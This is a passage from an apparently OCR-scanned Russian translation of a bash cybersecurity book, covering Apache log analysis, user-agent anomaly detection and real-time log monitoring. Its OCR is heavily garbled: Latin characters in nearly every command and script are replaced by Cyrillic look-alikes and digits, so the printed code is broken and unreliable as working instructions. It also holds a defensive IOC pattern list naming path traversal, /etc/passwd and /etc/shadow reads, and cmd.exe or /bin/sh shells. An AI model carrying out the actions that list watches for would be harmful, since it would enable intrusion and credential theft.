$ сий -4' ' -#4,10 ассез$.1о8 


[12/№\/2017:15:52:59 2377 
[12/№\/2017:15:52:59 4529 
[12/3№0у/2017:15:52:59 1112 


Как видно из этого вывода, необработанные данные начинаются с символа [. 
Из-за него в сценарии появляется проблема, так как он обозначает начало массива 
в Баѕћ. Чтобы эту проблему устранить, можно использовать дополнительную ите- 
рацию команды сиё с параметром -с2, с помощью которого символ будет удален. 
Этот параметр указывает команде сиё извлекать данные по символам, начиная 
с позиции 2 и переходя к концу строки (-). Вот исправленный вывод с удаленной 
квадратной скобкой: 


$ сиё -а' ' -#4,10 ассеѕ5.108 | си -с2- 


12/№\/2017:15:52:59 2377 
12/3№0у/2017:15:52:59 4529 
12/№\/2017:15:52:59 1112 
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Вместо того чтобы второй раз использовать команду сиё, можно добавить команду 
г. Параметр -а удаляет указанный символ — в данном случае квадратную скобку. 


си -4' ' -#4,10 ассеѕ5.108 | 4г -а '[' 


Необходимо также определить способ группирования данных, связанных с датами: 
по дню, месяцу, году, часу и т. д. Для этого можно просто изменить параметр для 
второй итерации команды си*. В табл. 7.3 показаны параметры команды си*, кото- 
рые используются для извлечения различных форм поля даты/времени. Обратите 
внимание, что эти параметры предназначены для файлов журнала АрасВе. 


Таблица 7.3. Извлечение поля даты/времени журнала Арасһе 


Извлечение даты/времени |Образец вывода Параметры команды сиё 
Дата/время 12/3оу/2017:19:26:09 -с2- 

Месяц, день и год 12/М№ шу/2017 -с2-12,22- 

Месяц и год №оу/2017 -с5-12,22- 

Полное время 19:26:04 -с14- 

Час 19 -с14-15,22- 

Год 2017 -с9-12,22- 


Сценарий һіѕёовгат. ѕ$һ может быть особенно полезен при просмотре данных, свя- 
занных с датами. Например, если в организации имеется внутренний веб-сервер, 
доступ к которому осуществляется только в рабочее время с 09:00 до 17:00, можно 
с помощью такой гистограммы ежедневно просматривать файл журнала сервера, 
чтобы проверить, имеются ли всплески активности после обычного рабочего дня. 
Большие всплески активности или передача данных вне обычного рабочего вре- 
мени может свидетельствовать об эксфильтрации со стороны злоумышленника. 
При обнаружении каких-либо аномалий можно отфильтровать данные по конкрет- 
ной дате и времени и проверять доступ к странице, чтобы определить, является ли 
действие вредоносным. 


Например, если требуется просмотреть гистограмму общего объема данных, полу- 
ченных в определенный день за каждый час, можно выполнить следующую команду: 


$ амк '$4 ~ "12/№0у/2017" {рг1пе $0}' ассез$.1ов | сиё -а' ' -#4,10 | 
Сие -с14-15,22- | БазН ѕиттег.5һ | баѕһ һіѕовгат. ѕһ 


17 ## 
16 НЕЕ 
15 ЗЕЕ 
19 ## 


18 #999999 999НННННЕ 
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Здесь файл ассеѕѕ.10ов пересылается с помощью команды амк для извлечения 
записей с определенной датой. Обратите внимание на использование вместо сим- 
волов == оператора подобия (~), поскольку поле 4 также содержит информацию 
о времени. Эти записи передаются команде сиё сначала для извлечения полей 
даты/времени и переданных байтов, а затем для извлечения данных о времени. 
После этого с помощью сценария ѕиттег.ѕћ данные суммируются по времени 
(часам) и с помощью һіѕёовгат. 5ћ преобразуются в гистограмму. Результатом ста- 
новится гистограмма, которая отображает общее количество байтов, передаваемых 
каждый час 12 ноября 2017 года. 


Чтобы получить вывод в числовом порядке, передайте его из сценария гистограммы 
команде 501 -п. Зачем нужна сортировка? Сценарии зиттег.5! и һіѕіодгат.ѕћ, 
просматривая список индексов своих ассоциативных массивов, генерируют свои 
выходные данные. Поэтому их вывод вряд ли будет осмысленным (скорее данные 
будут выведены в порядке, определяемом внутренним алгоритмом хеширования). 
Если это объяснение оставило вас равнодушными, просто проигнорируйте его 
и не забудьте использовать сортировку на выходе. 


Если вы хотите, чтобы вывод был упорядочен по объему данных, вам нужно будет 
добавить сортировку между двумя сценариями. Необходимо также использовать 
һіѕіодгат_ріаіп.5ћ — версию сценария гистограммы, в которой не применяются 
ассоциативные массивы. 


Поиск уникальности в данных 


Ранее ТР-адрес 192.168.0.37 был идентифицирован как система, которая имела 
наибольшее количество запросов страницы. Следующий логический вопрос: ка- 
кие страницы запрашивала эта система? Ответив на него, можно получить пред- 
ставление о том, что система делала на сервере, и классифицировать это действие 
как безопасное, подозрительное или вредоносное. Для этого можно использовать 
команду амк и сиё и передать вывод в соип*ем. $1: 


$ амк '$1 == "192.168.0.37" {ргіпё $0}' ассеѕѕ.108 | си -а' ' -#7 | 
БазИй соипфет.$Н | зогф -гп | Пеаа -5 


14 /#11еѕ/©һете/р1иріп49с2.ј5?1490908488 
14 /#11е5/©һете/тобі1е49с2.ј5?1490908488 
14 /+11е5/+пете/сизфот49с2.]$?1490908488 
14 /#і1еѕ/таіп_5+у1ІеаҒде. сѕ5?1509483497 
3 /сопѕи1%іпе. Ет 


Хотя извлечение и обрезка данных могут быть реализованы путем конвейерной 
передачи команд и сценариев, для этого потребуется передавать данные несколько 
раз. Такой метод можно применить ко многим наборам данных, но он не подходит 
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для очень больших наборов. Метод можно оптимизировать, написав сценарий 
Баѕћ, специально разработанный для извлечения и подсчета количества доступов 
к страницам, — для этого требуется только один проход данных. В примере 7.8 по- 
казан такой сценарий. 


Пример 7.8. радегед.ѕћ 


# Ваѕһ и кибербезопасность 
# рарегед. ѕһћ 
# 
# Описание: 
# Подсчет с помощью баѕћ количества запросов страниц для данного ТР-адреса 
# 
# Использование: 
# рарегед <ір ад4ге$$> < іприё+і1е 
# <1р аййгеѕ5> ІР-адрес для поиска 
# 
дес1аге -А спі Ф 
мһі1е геаа аааг 41 42 даф1т ртёоҒҒ рег раре +һегеѕ+ 
ао 
1+ [[ $1 == $аааг ]] ; +һеп 1еЕ сп&[$раве]+=1 ; +1 
аопе 
Ғог іа іп ${!сп[@]} ө 
о 
рг1пЕ+ "%8а %$\п" ${сп[$14а]} $1а 
опе 


© Мы объявляем сп как ассоциативный массив и в качестве индекса можем ис- 
пользовать строку. В данной программе в качестве индекса мы будем использовать 
адрес страницы (О ВТ.). 


Ө $! спе [@]} выводит список всех значений индекса, которые были обнаружены. 
Обратите внимание: они не будут перечислены в удобном порядке. 


В ранних версиях Баѕћ ассоциативных массивов нет. Подсчитать количество раз- 
личных запросов страниц с определенного ІР-адреса вы можете с помощью коман- 
ды амк, потому что в ней есть ассоциативные массивы (пример 7.9). 


Пример 7.9. радегег.амК 


ВазИ и кибербезопасность 
разегеа.амк 


Описание: 
Подсчет количества запросов страниц для данного ІР-адреса с помощью амКк 


Использование: 
разегеа <ір адаге$$> < іпри+ё+і1е 
<1р аайгеѕ5> ІР-адрес для поиска 


{+ 
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# подсчитать количество запросов страниц с адреса ($1) 
амк -у раве="$1" '{ 1+ ($1==раёе) {сп[$7]+=1 } } 
ЕМО { Фог (14 іп сп) { 

рг1пЕЕ "%8а %5\п", сп[1а], іа 

} 


ое 


}' 
© В этой строке есть две переменные $1, разница между которыми очень большая. 
Первая переменная $1 является переменной оболочки и ссылается на первый 
аргумент, предоставленный этому сценарию при его вызове. Вторая переменная 
$1 — это амк. В каждой строке эта переменная относится к первому полю ввода. 
Первая переменная $1 была назначена странице переменной амк, чтобы ее можно 
было сравнить с каждой переменной $1 амк (то есть с каждым первым полем вход- 
ных данных). 


Ө Простой синтаксис приводит к тому, что переменная іа перебирает значения 
индекса в массиве спё. Это гораздо более простой синтаксис, чем синтаксис обо- 
лочки "${ ! сп[@]}", но такой же эффективный. 


Можно запустить сценарий равегед. $Н, указав ІР-адрес, который требуется найти 
и перенаправить ассе$$ .1ов в качестве входных данных: 


$ БазИ равегеа.$Н 192.168.0.37 < ассеѕ5.106 | ѕог -гп | һеаа -5 


14 /#11еѕ/©һете/р1иріп49с2.ј5?1490908488 
14 /#11е5ѕ/©һете/тобі1е49с2.ј5?1490908488 
14 /+11е5/+пете/си$фот49с2.]5?1490908488 
14 /#і1еѕ/таіп_5+у1ІеаҒде. сѕ5?1509483497 
3 /сопѕи1%іпе. ет 


Выявление аномалий в данных 


В Интернете строка агента пользователя представляет собой небольшой фраг- 
мент текстовой информации, отправляемый браузером на веб-сервер, который 
идентифицирует операционную систему клиента, тип браузера, версию и другую 
информацию. Обычно используется веб-серверами для обеспечения совместимости 
страниц с браузером пользователя. Вот пример такой строки: 


Мо2111а/5.0 (Міпаомѕ МТ 6.3; Міпб4; х64; гу:59.0) Сбеско/20100101 Ғіге+ох/59.0 


Эта строка идентифицирует систему как №іпіоуѕ МТ версии 6.3 (она же \/ш4о\ 8.1) 
с 64-разрядной архитектурой и с браузером Еігеѓох. 


Строка агента пользователя может нас заинтересовать по двум причинам. Во- 
первых, значительный объем информации, которую эта строка передает, можно 
применять для идентификации типов систем и браузеров, обращающихся к сер- 
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веру. Во-вторых, эта строка настраивается конечным пользователем и может быть 
использована для идентификации систем, в которых не установлен стандартный 
браузер или вообще нет браузера (то есть поисковых роботов (жер ста\ег)). 


Вы можете определить необычные пользовательские агенты, предварительно со- 
ставив список известных безопасных пользовательских агентов. Для этого упраж- 
нения мы используем очень маленький список браузеров, которые не являются 
специфичными для конкретной версии (пример 7.10). 


Пример 7.10. иѕегадепіѕ.іхі 


Е1гефох 
Сһготе 
ЅаҒагі 
Еағве 


Список популярных пользовательских агентов можно найти по адресу Һір:// 
Ьі. 1у/2\%и9јХІ. 


Затем вы можете прочитать журнал веб-сервера и сравнить каждую строку со 
списком популярных пользовательских агентов (браузеров), пока не будет по- 
лучено совпадение. Если совпадения не будет, строка должна рассматриваться 
как аномалия и печататься в стандартном выводе вместе с ГР-адресом системы, 
выполняющей запрос. Такое сравнение дает нам дополнительную информацию, 
связанную с рассматриваемыми данными, — с ее помощью мы сможем идентифи- 
цировать систему с необычным пользовательским агентом и получим еще один 
путь для дальнейшего изучения. 


Пример 7.11. иѕегадепіѕ.ѕћ 
#!/61п/Базй - 


# 

# Ваѕһ и кибербезопасность 

# изегавепт{$ . $В 

# 

# Описание: 

# Чтение журнала и поиск неизвестных пользовательских агентов 
# 

# Использование: ./изегавепе$.$И < <1при+11е> 

# <іприєғі1е»> Журнал веб-сервера Арасһе 

# 


+ 


несовпадение — поиск по массиву известных имен 
возвращает 1 (Ға1ѕе), если совпадение найдено 
возвращает @ (гие), если совпадений нет 


+ + 
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Ғипсёіоп тіѕтаёсһ () © 
{ 
10са1 -1 1 ө 
Фог ((1=0; 1<$КМУТИЕ; і++)) 
ао 
[ "$1" => .*${кмомм[$1]}.* 11 && геёигп 1 © 
опе 
гефигп ө 


геадаггау -© КМОММ < "иѕегарепёѕ. х" 
К№Ѕ12Е=${ #КМОИМ[@]} 


А) 


# предварительная обработка лог-файла (5+аіп), 
# чтобы выбрать ТР-адреса и пользовательские агенты 
амк -Е'"' "Хргіпё $1, $6}' | \ 
мһі1е геа 1ра@4г ааѕһ1 дӢаѕһ2 4%$5Фатр ае1%а изегавеп{е [6] 
до 

1+ міѕтасһ "$изегавепт*" 

{Пеп 

есһо "апота1у: $1радаг Физегавеп{" 

11 

допе 


© Сценарий будет основан на функции несовпадения. Если обнаружится несоот- 
ветствие, будет возвращено значение ѕиссеѕ5 или гие. Это значит, что совпадение 
со списком известных пользовательских агентов не найдено. Данная логика может 
показаться нестандартной, но так удобнее читать оператор 1+, содержащий вызов 
тіѕта&сћ. 


Ө Объявление нашего цикла ог в качестве локальной переменной — хорошая идея. 
Данный шаг в сценарии не является обязательным. 


Ө Здесь представлены две строки для сравнения: входные данные из файла журна- 
ла и строка из списка известных пользовательских агентов. Для гибкого сравнения 
используется оператор сравнения регулярных выражений (&һе=~). Значение . * 
(ноль или более вхождений любого символа), размещенное по обе стороны ссылки 
массива ФКМОИМ, говорит о том, что совпадение известной строки может быть най- 
дено в любом месте другой строки. 


Ө Каждая строка файла добавляется как элемент к указанному имени массива. 
Это дает нам массив известных пользовательских агентов. В Баѕћ существует два 
способа добавить строки к массиву: использовать либо геадаггау, как сделано 
в этом примере, либо мар 11е. Опция -* удаляет завершающий символ новой 
строки из каждой прочитанной строки. Здесь указан файл, содержащий список 
известных пользовательских агентов; при необходимости его можно изменить. 
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Ө Здесь вычисляется размер массива. Полученное значение используется внутри 
функции тіѕтаёсһ для циклического перебора массива. Вне нашего цикла мы вы- 
числяем его один раз, чтобы при каждом вызове функции избежать повторного 
вычисления. 


© Входная строка представляет собой сложное сочетание слов и кавычек. Чтобы 
захватить строку агента пользователя, в качестве разделителя полей мы указы- 
ваем двойные кавычки. Однако это означает, что наше первое поле содержит 
больше чем просто ІР-адрес. Используя команду геаа для получения ІР-адреса, 
мы можем проанализировать пробелы. Последний аргумент геаа принимает все 
оставшиеся слова, чтобы можно было захватить все слова строки пользователь- 
ского агента. 


При запуске сценария изегареп*$ . И будут выведены любые строки пользователь- 
ского агента, не найденные в файле иѕегавепіѕ . Ех{: 


$ Баѕһ иѕегарепѕ.5һ < ассе$$.105 


апота1у: 192.168.0.36 Мо2111а/4.5 (сотра+ір1е; НТТгаск 3.0х; Міпаомѕ 98) 
апота1у: 192.168.0.36 Мо2111а/4.5 (сотра+ір1е; НТТгаск 3.0х; Міпаомѕ 98) 
апота1у: 192.168.0.36 Мо2111а/4.5 (сотраф161е; НТТгаск 3.0х; Міпаомѕ 98) 
апота1у: 192.168.0.36 Мо2111а/4.5 (сотра+ір1е; НТТгаск 3.0х; Міпаомѕ 98) 


апота1у: 192.168.0.36 Мо2111а/4.5 (сотра+ір1е; НТТгаск 3.0х; Міпаомѕ 98) 


Выводы 


В этой главе мы рассмотрели методы статистического анализа для выявления 
необычной и аномальной активности в файлах журналов. Такой анализ даст вам 
представление о том, что происходило ранее. В следующей главе мы рассмотрим, 
как анализировать файлы журналов и другие данные, чтобы понять, что происходит 
в системе в режиме реального времени. 


Упражнения 


1. В следующем примере для печати первого и десятого полей файла ассез$. 108 
используется команда си+: 


$ си{ -4' ' -+1,10 ассеѕ5.108 | БазИ ѕиттег.ѕһ | зоге -К 2.1 -гп 
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Замените команду си* командой амк. Вы получили те же результаты? Какие 
различия вы увидели в этих двух методах? 


2. Разверните сценарий һіѕёовгат. $Н, чтобы включить счетчик в конце каждой 
гистограммы. Вот пример выходных данных: 


192.168.0.37 ЗНННННННННННННННННННННЕННННННЕ — 2575030 
192.168.0.2 ННННННЕ — 665693 

3. Разверните сценарий һіѕёовгат. $Н, чтобы пользователь мог указать параметр -5, 
определяющий максимальный размер столбца. Например, һіѕќовгат. $1 -$ 25 
ограничит максимальный размер столбца до 25 символов #. Если параметр 
не задан, значение по умолчанию должно оставаться равным 50. 


4. Измените сценарий изегавеп+$ . Н так, чтобы добавить следующие параметры. 


® Добавьте код для необязательного первого параметра, такого как имя 
файла известных хостов. Если этот параметр не указан, по умолчанию 
используется имя Кпомп.һоѕѕ в том виде, в котором оно представлено 
в данный момент. 


ә Добавьте код для параметра -+, чтобы принять аргумент. Аргумент — это имя 
файла журнала, предназначенного для чтения, а не для получения из $ т. 


5. Измените сценарий равегед. $Н так, чтобы он работал с традиционным масси- 
вом, использующим числовой индекс, а не с ассоциативным массивом. Чтобы 
можно было задействовать ІР-адрес, преобразуйте его в 10—12-значное число. 
Внимание! Не указывайте перед числом нули, так как оболочка попытается 
интерпретировать его как восьмеричное. Например, преобразуйте 10.124.16.3 
в 10124016003 и используйте в качестве числового индекса. 


Чтобы просмотреть дополнительные ресурсы и получить ответы на эти вопросы, 
зайдите на сайт ПИрь: //млмм.гарасубегор$.сот/. 


Мониторинг журналов 
в режиме реального времени 


Умение анализировать журнал после того, как событие произошло, — важный 
навык. Но не менее важно иметь возможность извлекать информацию из файла 
журнала в режиме реального времени, чтобы обнаруживать вредоносные или подо- 
зрительные действия в то время, когда они происходят. В этой главе мы рассмотрим 
методы чтения записей журнала по мере их создания и форматирования для вывода 
аналитики и создания предупреждений на основе известных показателей угрозы 
для работы системы или сети (іпаісаѓогѕ оЁ сотрготіѕе). 


Техническое обслуживание, мониторинг и анализ журналов аудита определены 
Центром интернет-безопасности в качестве 20 основных элементов контроля 
безопасности. Дополнительные сведения можно получить на странице ПЁре:// 
млм. Сессии у. огд/сопёго|5/. 


Мониторинг текстовых журналов 


Самый простой способ мониторинга журнала в режиме реального времени — ис- 
пользовать команду +аі1 с параметром -# — она непрерывно считывает файл и по 
мере добавления новых строк выводит их в $(4ои(. Как и в предыдущих главах, для 
примеров будем использовать журнал доступа к веб-серверу Арасће, но описанные 
методы актуальны для любого текстового журнала. Чтобы отслеживать журнал 
доступа АрасБе с помощью команды &аі1, введите следующее: 


{а11 -Ғ /уаг/105$/арасНе2/ассе$$.1о8 


Вывод из команды +а11 может быть передан команде егер, поэтому будут выво- 
диться только записи, соответствующие определенным критериям. В следующем 
примере отслеживается журнал доступа Арасће и выводятся записи, соответству- 
ющие конкретному ІР-адресу: 

{а11 -+ /маг/1085/арасһе2/ассеѕ5.10в | вгер '10.0.0.152' 
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Можно также использовать регулярные выражения. В этом примере будут ото- 
бражаться только записи, возвращающие код состояния НТТР 404 «Страница 
не найдена»; параметр -1 добавляется для игнорирования регистра символов: 


{а11 -+ /уаг/1овѕ/арасһе2/ассеѕ5.108 | ергер -1 'НТТР/.*" 404" 


Для очистки от посторонней информации вывод следует передать команде си*. 
В этом примере выполняется мониторинг журнала доступа для запросов, при- 
водящих к коду состояния 404, а затем используется метод сиё для отображения 
только даты/времени и запрашиваемой страницы: 

$ +аі1 -+ ассеѕ5.108 | ергер --1іпе-биҒҒегеа 'НТТР/.*" 404' | си -а' ' -#4-7 


[29/3и1/2018:13:10:05 -0400] "СЕТ /+еѕ+ 

[29/2и1/2018:13:16:17 -0400] "СЕТ /%е$+. 4х 

[29/301/2018:13:17:37 -0400] "СЕТ /Ғауісоп.ісо 

Далее, чтобы убрать квадратные скобки и двойные кавычки, вы можете направить 
вывод в г -а '[]"' 


Обратите внимание: здесь используется параметр - -1іпе-би#Ғегіпе команды евгер. 
Это вынуждает ергер выводить в ѕійои каждый раз, когда происходит разрыв стро- 
ки. Без данного параметра произойдет буферизация и выходные данные не будут 
переданы команде си* до тех пор, пока буфер не будет заполнен. Мы не хотим так 
долго ждать. Данный параметр позволит команде евгер записывать каждую строку 
сразу по мере ее нахождения. 


БУФЕРЫ КОМАНДНОЙ СТРОКИ 


Что же происходит при буферизации? Представьте, что евгер находит много строк, 
соответствующих указанному шаблону. В этом случае у евгер будет много выходных 
данных. Но вывод (фактически любой ввод или вывод) намного затратнее (занимает 
больше времени), чем обработка данных (поиск текста). Таким образом, чем меньше 
вызовов ввода/вывода, тем эффективнее будет работа программы. 


При обнаружении совпадения семейство программ вгер копирует совпадающую 
строку в большую область памяти, называемую буфером, в котором достаточно места 
для размещения большого количества строк текста. После поиска и копирования 
множества совпадающих строк буфер заполнится. Затем вгер делает один вызов для 
вывода всего буфера. Представьте себе случай, когда ргер может поместить 50 со- 
впадающих строк в буфер. В этом случае, вместо того чтобы сделать 50 выходных 
вызовов, по одному для каждой строки, необходимо сделать только один вызов. Это 
В 50 раз эффективнее! 


Это хорошо работает для большинства применений программы ергер, например, когда 
мы проводим поиск в файле и просматриваем его от начала до конца. Программа евгер 
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будет записывать каждую найденную строку в буфер, и не потребуется много време- 
ни, чтобы добраться до конца файла. По достижении конца файла, когда поступление 
данных прекратится, буфер будет очищен, то есть содержимое буфера будет запи- 
сано, даже если он заполнен только частично. Когда входные данные поступают из 
файла, обычно этот процесс идет быстро. 


Но при чтении из конвейера, особенно для нашего примера, когда +аі1 -+ вносит дан- 
ные в конвейер не так часто (только когда происходят определенные события), данных 
для заполнения буфера может не хватить. Буфер, чтобы мы увидели его содержимое 
в <реальном времени», в ближайшее время не будет очищен. Нам придется подождать 
его заполнения. А на это может уйти несколько часов или даже дней. 


Решение состоит в том, чтобы по мере нахождения каждой строки указать евгер 
использовать менее эффективную технику записи, по одной строке за раз. Команда 
при обнаружении каждого совпадения будет сохранять данные, перемещающиеся по 
конвейеру. 


Обнаружение вторжений с помощью журнала 


Для мониторинга журнала и вывода любых записей, которые соответствуют извест- 
ным шаблонам подозрительной или вредоносной деятельности, часто называемым 
ТОС, можно использовать возможности команд +аі1 и евгер. Вы можете создать 
простую систему обнаружения вторжений (105). Для начала создадим файл, со- 
держащий шаблоны регулярных выражений для ТОС, как показано в примере 8.1. 


Пример 8.1. іос.їхі 


\.\./ © 
еєс/раѕѕмі Ө 
еёс/ѕһайом 
ста\.ехе Ө 
/ріп/ѕћ 
/ріп/баѕћ 


© Этот шаблон (../) является показателем обходной атаки каталога: злоумышлен- 
ник пытается выйти из текущего рабочего каталога и добраться к файлам, доступ 
к которым ему закрыт. 


Ө Файлы Гіпих еёс/раѕѕма и ес/ѕһайом используются для аутентификации си- 
стемы и никогда не должны быть доступны через веб-сервер. 


Ө Обслуживание файлов ста. ехе, /біп/ѕһ или /біп/баѕћ является показателем 
наличия обратного подключения, возвращаемого веб-сервером. Обратное под- 
ключение часто говорит об успешной попытке эксплуатации. 
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Обратите внимание, что [ОС должны быть в формате регулярного выражения, 
так как они позже будут использоваться командой евгер. 


Мы не можем подробно обсуждать ІОС для веб-серверов, так как показателей 
компрометации слишком много. Дополнительные примеры таких показателей 
можно скачать на сайте Һіёр://6їё.1у/2и55445. 


Файл іос.іхі можно использовать с параметром евгер -+. Данный параметр при- 
казывает евгер выполнять поиск в шаблонах регулярных выражений из указанного 
файла. Это позволяет вам использовать команду +аі1 для мониторинга файла 
журнала, и при добавлении каждой записи прочитанная строка будет сравнивать- 
ся со всеми шаблонами в файле ІОС, выводя любую соответствующую запись. 
Вот пример: 


{а11 -+ /уаг/10ов5/арасһе2/ассеѕ5.108 | ергер -1 -+ іос.іхі 


Кроме того, команда {ее может использоваться для одновременного отображения 
предупреждений на экране и сохранения их для последующей обработки в соб- 
ственном файле: 


{а11 -+ /уаг/10ов5/арасһе2/ассеѕѕ.108 | ергер --11пе-Биегед -1 -+ іос.іхі | 
{ее -а іпёегеѕ&іпе. хі 


Опять же опция --14пе-Биегед нужна, чтобы гарантировать отсутствие проблем, 
вызванных буферизацией вывода команды. 


Мониторинг журналов \\ИпЧо\м/$ 


Как уже говорилось, для доступа к событиям \/ш4о\з нужно использовать коман- 
ду меуи+і1. Хотя эта команда универсальна, она не имеет такой функционально- 
сти, как +аі1, которую можно задействовать для извлечения новых поступающих 
записей. Но выход есть — использовать простой сценарий Баѕћ, который может 
предоставить такую же функциональность (пример 8.2). 


Пример 8.2. митай.5Н 


#!/61п/Ба$й - 

# 

Вай и кибербезопасность 
м1п%а11.$И 


Описание: 


# 
# 
# 
# 
# Выполнение функции наподобие +а11 для журнала Міпӣомѕ 
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# 

# Использование: . /міпёаі1.5һ 

# 

МІМ.06= "Арр1ісасіоп" Ф@ 

ГАЗТЕОб=$ (меу+и+і1 де "Фитмеоб" //с:1 //га: гие //+#:+ехї) ө 


мһі1е Ёгие 


ао 
СУВКЕМТЕОб=$ (меуёи11 де "ФАІМ 0С" //с:1 //га: гие //+#:+ех+) [3] 
1+ [[ "$СУВВЕМТЬОб" != "ЗЕАЗТЬОб" ]] 
ёһеп 
есһо "$СУВВЕМТЕОб" 
есе "еее ан тенен аана ненае " 
АЅТІОС= "$СОККЕМТІОС" 
1 
4опе 


© Этой переменной определяется журнал \/т4о\з, который вы хотите отслежи- 
вать. Для получения списка журналов, доступных в системе в настоящее время, 
можете использовать команду ме\и{11 е1. 


Ө Здесь для запроса указанного файла журнала выполняется команда меуёи+і1. 
Параметр с:1 возвращает только одну запись журнала. Параметр га: гие позволяет 
команде считать самую последнюю запись журнала. Наконец, #:ехї возвращает 
результат в виде обычного текста, а не в формате ХМТ, что позволяет легко читать 
результат с экрана. 


Ө В следующих нескольких строках снова выполняется команда ме\уи{11 и только 
что полученная запись журнала сравнивается с той, которая была напечатана на 
экране последней. Если они друг от друга отличаются, это означает, что в журнале 
произошли изменения. В этом случае на экран выводится новая запись. Если же 
сравниваемые записи одинаковы, ничего не происходит и команда меуёи+і1 воз- 
вращается назад и снова начинает поиск и сравнение. 


Создание гистограммы, актуальной 
в реальном времени 


Команда +аі1 -+ обеспечивает текущий поток данных. А что делать, если требуется 
подсчитать количество строк, которые были добавлены в файл за определенный 
промежуток времени? За этим потоком данных можно понаблюдать, запустить 
таймер и выполнять подсчет на протяжении заданного промежутка времени; затем 
подсчет следует прекратить и сообщить о результатах. 
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Эту работу можно разделить на два процесса-сценария: один сценарий будет счи- 
тать строки, а другой — наблюдать за временем. Таймер уведомляет счетчик строк 
с помощью стандартного механизма межпроцессной связи РОЅІХ, называемого 
сигналом. Сигнал — это программное прерывание, и существуют различные виды 
сигналов. Некоторые из них являются фатальными — приводят к завершению 
процесса (например, исключение в операции с плавающей запятой). Большинство 
из этих сигналов могут быть как проигнорированы, так и пойманы. Действие пред- 
принимается, когда сигнал пойман. Многие из этих сигналов имеют предопреде- 
ленное назначение в операционной системе. Мы будем использовать один из двух 
сигналов, доступных пользователям. Это сигнал $160$81 (другой — это $16582). 


Сценарии оболочки могут перехватывать прерывания, используя встроенную 
команду «гар. С ее помощью можно выбрать команду, определяющую, какое дей- 
ствие требуется выполнить при получении сигнала, и список сигналов, запуска- 
ющих вызов данной команды. Например: 


Фгар магптз& 5ІСІМТ 


Это приводит к тому, что команда магитз8 (наш собственный сценарий или функ- 
ция) вызывается всякий раз, когда сценарий оболочки получает сигнал 516ІМТ, 
например, когда для прерывания запущенного процесса вы нажмете сочетание 
клавиш СИС. 


В примере 8.3 показан сценарий, выполняющий подсчет. 


Пример 8.3. Іоорег.5ћ 
#1/ріп/баѕћ - 


# 

# Ваѕһ и кибербезопасность 

# 1оорег.ѕһ 

# 

# Описание: 

# Подсчет строк в файле 

# 

# Использование: ./1оорег.ѕһ [+і1епате] 

# +Ті1епате — имя файла, который должен проверяться, 

# по умолчанию: 106. Ғі1е 

# 

Ғипсёіоп іпёегуа1 () Ф 

{ 
есһо $(4афе '+%у%та НҰМ%5') фспё [2] 
спі=0 

} 


дес1аге -1 спі=0 
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{гар іпёегма1 5160581 © 
$Пор+ -5 1аѕёріре ө 


{а11 -+ --р19=$$ ${1:-106.Ғі1е} | мһі1е геаа а11пе Ө 
о 

Іеї спі++ 
опе 


© Функция іпёегуа1 будет вызываться при получении каждого сигнала. Конечно, 
интервал должен быть определен до того, как мы сможем его назвать и использо- 
вать в нашем выражении «гар. 


Ө Команда ӣаќе вызывается, чтобы предоставить временную метку для значения 
переменной сп, которое мы распечатываем. После вывода показания счетчика мы 
сбрасываем это значение на 9, чтобы начать отсчет следующего интервала. 


© Теперь, когда интервал определен, мы можем указать, чтобы функция вызыва- 
лась всякий раз, когда наш процесс получает сигнал $160$81. 


Ө Это очень важный шаг. Обычно, когда есть конвейер команд (например, 
15-1 | егер гих | мс), части конвейера (каждая команда) выполняются в подсетях 
и каждый процесс заканчивается своим собственным идентификатором процес- 
са. Это могло бы стать проблемой для данного сценария, потому что цикл мһі1е 
будет находиться в подоболочке с другим идентификатором процесса. Какой бы 
процесс ни начался, сценарий 1оорег. ѕћ не будет знать идентификатора процес- 
са цикла мһі1е, чтобы отправить ему сигнал. Кроме того, изменение значения 
переменной сп? в подоболочке не изменяет значение спі в основном процес- 
се, поэтому сигнал для основного процесса каждый раз приведет к установке 
значения 0. Решить эту проблему можно с помощью команды ѕһорё, которая 
устанавливает (-ѕ) параметр 1а5р1ре. Он указывает оболочке не создавать для 
последней команды в конвейере подоболочку, а запускать эту команду в том же 
процессе, в котором запущен сам сценарий. В нашем случае это означает, что 
команда +а11 будет выполняться в подоболочке (то есть в другом процессе), 
а цикл мһі1е станет частью основного процесса сценария. Внимание: эта опция 
оболочки доступна только в БазВ версии 4.х и выше и только для неинтерактив- 
ных оболочек (то есть сценариев). 


Ө Это команда *а11 -Ғ еще содним параметром --р19. Мы указываем идентифика- 
тор процесса, который по завершении данного процесса завершит работу команды 
+аі1. Мы указываем идентификатор процесса текущего сценария оболочки $$, ко- 
торый нужно просмотреть. Это действие позволяет очистить процессы и не остав- 
лять команду +аі1 выполняться в фоновом режиме (если, скажем, этот сценарий 
выполняется в фоновом режиме; пример 8.4). 
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Сценарий {а11соип* . ѕћ запускает и останавливает сценарий с секундомером (тай- 
мер) и ведет подсчет временных интервалов. 


Пример 8.4. {аіїсоипё.5ћ 


#1/ріп/баѕћ - 

# 

Вай и кибербезопасность 
{а11 соци. 5$И 


Описание: 
Подсчет строк каждые п секунд 


Использование: ./а11соип*.$И [+11епаме] 
+11епате: проанализировать 1оорег. ѕһ 


{Ен 


# очистка — другие процессы на выходе 
ФипсЕ1оп с1еапир () 


{ 

[[ -п $Е0РТЬ ]] && Кі11 $10РІР Ф 
} 
{гар с1еапир ЕХІТ ө 
БазН 1оорег.5һ $1 & [3] 
ГОРТО=$! ө 
# даем возможность начать 
$1еер 3 


мһі1е +гие 


о 
Кі11 -5160$81 $10РІР” 
$1еер 5 
допе >82 [5] 


© Поскольку этот сценарий будет запускать другие сценарии, после работы он 
должен выполнить очистку. Если идентификатор процесса был сохранен в І0РІР, 
переменная будет хранить значение, поэтому функция с помощью команды кі11 
отправит этому процессу сигнал. Если в команде кі11 не указать конкретный сиг- 
нал, то по умолчанию будет отправлен сигнал 516ТЕКМ. 


Ө Команда ЕХІТ не является сигналом. Это специальный случай, когда оператор 
{гар указывает оболочке вызвать эту функцию (в данном случае с1еапир), если 
оболочка, выполняющая данный сценарий, собирается завершить работу. 


Ө Теперь начинается настоящая работа. Запускается сценарий 1оорег. $1, который 
будет работать в фоновом режиме: чтобы этот сценарий работал на протяжении 
всего цикла (не дожидаясь команды на завершение работы), он отсоединяется от 
клавиатуры. 
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Ө Здесь сохраняется идентификатор процесса сценария, который мы только что 
запустили в фоновом режиме. 


© Данное перенаправление — просто мера предосторожности. Весь вывод, посту- 
пающий из цикла мп 11е или от операторов К111/$1еер (хотя их мы не ожидаем), 
не должен смешиваться с любыми выводами функции 1оорег. $Н, которая, хотя 
